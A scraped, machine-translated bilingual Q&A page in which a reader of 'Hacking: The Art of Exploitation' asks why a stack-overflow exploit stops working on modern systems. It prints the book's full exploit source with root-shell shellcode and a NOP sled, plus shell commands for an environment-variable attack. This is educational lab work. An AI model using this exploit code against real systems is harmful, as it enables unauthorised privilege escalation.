为什么这个 shellcode 不执行?
[英]Why won't this shellcode execute?
问题描述
I'm working through Hacking: The Art of Exploitation and am running into my first snag trying to get a known working exploit to run from the book via an environment variable.
我正在研究Hacking: The Art of Exploitation并且遇到了我的第一个障碍,试图通过环境变量从书中运行一个已知的工作漏洞。 All programs were compiled with -fno-stack-protector -zexecstack -no-pie -fno-pie .所有程序都使用-fno-stack-protector -zexecstack -no-pie -fno-pie编译。
Running exploit_notesearch.c (albeit with aa very specific offset), I was able to get the exploit to pop a shell by moving the offset with argv[1] .运行exploit_notesearch.c (尽管有一个非常具体的偏移量),我能够通过移动偏移量来获得利用argv[1]来弹出 shell 的漏洞利用程序。 This works on modern OSes (with ASLR disabled) as well as the LiveCD included with the book.这适用于现代操作系统(禁用 ASLR)以及本书随附的 LiveCD。
exploit_notesearch.c exploit_notesearch.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=208;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
Further on in the chapter, we set the shellcode to an environment variable and attempt to redirect flow to the place on the stack where the SHELLCODE environment variable is set, halfway through the prepended NOP sled.在本章的后面,我们将 shellcode 设置为一个环境变量,并尝试将流重定向到堆栈上设置 SHELLCODE 环境变量的位置,在前面的 NOP sled 中途。 However, this never executes the exploit on modern OSes but works just fine in the Ubuntu 7.04 live CD that came with the book.然而,这永远不会在现代操作系统上执行漏洞利用,但在本书随附的 Ubuntu 7.04 live CD 中运行良好。 shellcode.bin is the shellcode at the top of the exploit_notesearch.c file ran with echo -en and redirected into a file. shellcode.bin是exploit_notesearch.c文件顶部的shellcode,使用echo -en运行并重定向到一个文件中。
$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
$ ./notesearch $(perl -e 'print "\x17\xf2\xff\xbf"x40') # Address halfway through NOP sled
What is going on here that has changed between old OSes and modern?旧操作系统和现代操作系统之间发生了什么变化? Is there a protection I'm unaware of that is preventing from riding the NOP sled to the shellcode?是否有一种我不知道的保护措施可以防止将 NOP 雪橇骑到 shellcode 上?
Thank you.谢谢你。
1 个解决方案
解决方案1
0 2021-11-24 15:24:48
The problem was stack alignment, compiling with -mpreferred-stack-boundary=2 aligns the stack similarly to the book.问题是堆栈 alignment,使用-mpreferred-stack-boundary=2编译时,堆栈的对齐方式与本书类似。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.